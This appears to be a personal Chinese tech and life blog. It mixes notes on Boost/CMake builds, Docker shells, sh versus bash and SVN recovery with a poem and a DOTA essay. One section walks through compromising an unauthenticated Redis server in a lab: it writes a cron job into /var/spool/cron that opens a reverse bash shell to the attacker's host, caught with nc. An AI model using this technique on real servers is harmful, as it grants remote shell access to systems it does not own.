多希望这场噩梦能快点醒来

最初,没有人在意这场灾难

这不过是一场山火,一次旱灾,

一个物种的灭绝,一座城市的消失。

直到这场灾难和每个人息息相关。

——《流浪地球》

Special Boost libraries With Cmake3

centos中默认安装的C++ boost libraries过于老旧有些依赖编译安装的软件预编译不过

Unable to find the Boost header files.  Please set BOOST_ROOT to the root   directory containing Boost or BOOST_INCLUDEDIR to the directory containing

https://www.boost.org下载最新的版本

wget https://dl.bintray.com/boostorg/release/1.72.0/source/boost_1_72_0.tar.gz
tar -xzf boost_1_72_0.tar.gz cd boost_1_72_0 ./bootstrap.sh --prefix=/opt/boost ./b2 install --prefix=/opt/boost --with=all

在cmake时指定boost安装路径

cmake3 -DBOOST_ROOT=/opt/boost

from https://cmake.org/cmake/help/v3.0/module/FindBoost.html

‘SSH’ into Docker container

docker ps
docker container exec -it <container name or id> /bin/sh

注意:红色部分取决于container使用的linux版本,大多数GNU/Linux系统其sh都连接到bash,在/bin文件夹下可观察到.

在bash存在的情况下上述命令也可为

docker container exec -it <container name or id> /bin/bash

如bash不存在则会发生如下错误

OCI runtime exec failed: exec failed: container_linux.go:345: starting container process caused "exec: \"/bin/bash\": stat /bin/bash: no such file or directory": unknown

What is sh

sh (or the Shell Command Language) is a programming language described by the POSIX standard. It has many implementations (ksh88dash, …). bash can also be considered an implementation of sh (see below).

Because sh is a specification, not an implementation, /bin/sh is a symlink (or a hard link) to an actual implementation on most POSIX systems.

What is bash

bash started as an sh-compatible implementation (although it predates the POSIX standard by a few years), but as time passed it has acquired many extensions. Many of these extensions may change the behavior of valid POSIX shell scripts, so by itself bash is not a valid POSIX shell. Rather, it is a dialect of the POSIX shell language.

bash supports a --posix switch, which makes it more POSIX-compliant. It also tries to mimic POSIX if invoked as sh.

sh = bash?

For a long time, /bin/sh used to point to /bin/bash on most GNU/Linux systems. As a result, it had almost become safe to ignore the difference between the two. But that started to change recently.

Some popular examples of systems where /bin/sh does not point to /bin/bash (and on some of which /bin/bash may not even exist) are:

  1. Modern Debian and Ubuntu systems, which symlink sh to dash by default;
  2. Busybox, which is usually run during the Linux system boot time as part of initramfs. It uses the ash shell implementation.
  3. BSDs, and in general any non-Linux systems. OpenBSD uses pdksh, a descendant of the Korn shell. FreeBSD’s sh is a descendant of the original UNIX Bourne shell. Solaris has its own sh which for a long time was not POSIX-compliant; a free implementation is available from the Heirloom project.

How can you find out what /bin/sh points to on your system?

The complication is that /bin/sh could be a symbolic link or a hard link. If it’s a symbolic link, a portable way to resolve it is:

% file -h /bin/sh
/bin/sh: symbolic link to bash

If it’s a hard link, try

% find -L /bin -samefile /bin/sh
/bin/sh
/bin/bash

In fact, the -L flag covers both symlinks and hardlinks, but the disadvantage of this method is that it is not portable — POSIX does not require find to support the -samefile option, although both GNU find and FreeBSD find support it.

Shebang line

Ultimately, it’s up to you to decide which one to use, by writing the «shebang» line.

E.g.

#!/bin/sh

will use sh (and whatever that happens to point to),

#!/bin/bash

will use /bin/bash if it’s available (and fail with an error message if it’s not). Of course, you can also specify another implementation, e.g.

#!/bin/dash

Which one to use

For my own scripts, I prefer sh for the following reasons:

  • it is standardized
  • it is much simpler and easier to learn
  • it is portable across POSIX systems — even if they happen not to have bash, they are required to have sh

There are advantages to using bash as well. Its features make programming more convenient and similar to programming in other modern programming languages. These include things like scoped local variables and arrays. Plain sh is a very minimalistic programming language.

from https://stackoverflow.com/a/5725402

通过redis渗透

如果redis绑定在0.0.0.0地址且无需密码访问并对/var/spool/cron有写入权限那很可能会对主机安全造成影响

渗透工具 nmap nc redis-cli(这里使用的是kail环境)

渗透目标 192.168.1.179

攻击机 192.168.1.73

使用nmap扫描目标,由于是测试端口范围已知,红色为redis集群端口

nmap -p 7000-7010 -sT -O 192.168.1.179
Nmap scan report for 192.168.1.179
Host is up (0.00032s latency).
PORT     STATE  SERVICE
7000/tcp closed afs3-fileserver
7001/tcp open   afs3-callback
7002/tcp open   afs3-prserver
7003/tcp open   afs3-vlserver
7004/tcp open   afs3-kaserver
7005/tcp open   afs3-volser
7006/tcp open   afs3-errors
7007/tcp closed afs3-bos
7008/tcp closed afs3-update
7009/tcp closed afs3-rmtsys
7010/tcp closed ups-onlinet

使用cli集群模式连接redis

redis-cli -c -h 192.168.1.179 -p 7001

切换至定时任务目录

192.168.1.179:7001> CONFIG SET dir /var/spool/cron

创建一个定时任务文件

192.168.1.179:7001> CONFIG SET dbfilename hack

设置一个定时任务反弹shell save保存exit退出

set payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.73/9999 0>&1\n\n"

进入指定端口交互式shell

nc -l -p 9999

渗透完成

SVN的迁移与恢复

在经历服务器断电硬盘恢复后重新恢复svn服务

首先使用svnadmin命令初始化一个仓库

svnadmin create repos

该存储库用于之后的导入

然后在恢复好的硬盘中找到原存储库的current文件观察当前递增的版本号,路径根据之前仓库路径变化

cat /mnt/usb/backup/sqn004\ lv_home/svn/repo/db/current
23082

使用dump命令导出原有存储库,如果仓库内容很多时间会很长

svnadmin dump /mnt/usb/backup/sqn004\ lv_home/svn/repo > /home/svnrepo.dump
* 已转存版本 0。
* 已转存版本 1。
* 已转存版本 2。
* 已转存版本 3。
      .
      .

期间如果出现导出失败记录下失败标号,当前事例由于存储空间问题失败与版本22986,释放空间后加入参数重新dump

svnadmin dump /mnt/usb/backup/sqn004\ lv_home/svn/repo/ -r 22986:23082 --incremental >svnrepo2.dump

完成后将dump文件重新load进新的存储库

svnadmin load /home/svn/repo/ < svnrepo.dump
svnadmin load /home/svn/repo/ < svnrepo2.dump

寥落风

大梦初醒已千年,凌乱罗衫,料峭风寒。

放眼难觅旧衣冠,疑真疑幻,如梦如烟。

看朱成碧心迷乱,莫问生前,但惜因缘。

魂无归处为情牵,贪恋人间,不羡神仙。

初秋

距中国对最后一次夺得Ti冠军,今年已是第三个年头,当中国队负于对手止步季军那一刹那仿佛回到了初中那会儿,那时因war3接触DOTA这张地图沉浸于它激烈的对抗和极富挑战的复杂操作,更着迷于小伙伴们开黑店的快乐.几个人坐在一排叽叽喳喳讨论哪个英雄厉害该怎么搭配,对黑的每一盘胜利总是能带给我们无与伦比的快乐,单纯的以为要打一辈子DOTA,要做一辈子朋友.时光流逝聚聚散散,可能再也看不见儿时的伙伴,就连这宝贵的回忆也随着时间一点点溜走这可能就是时间神奇的地方,它总是把回忆擦拭的斑斑勃勃然后让你自己凭着一厢情愿填填补补,它行进的依然坚实有力碾碎任何可以阻挡的幻想,再见了这个紫色的夏天.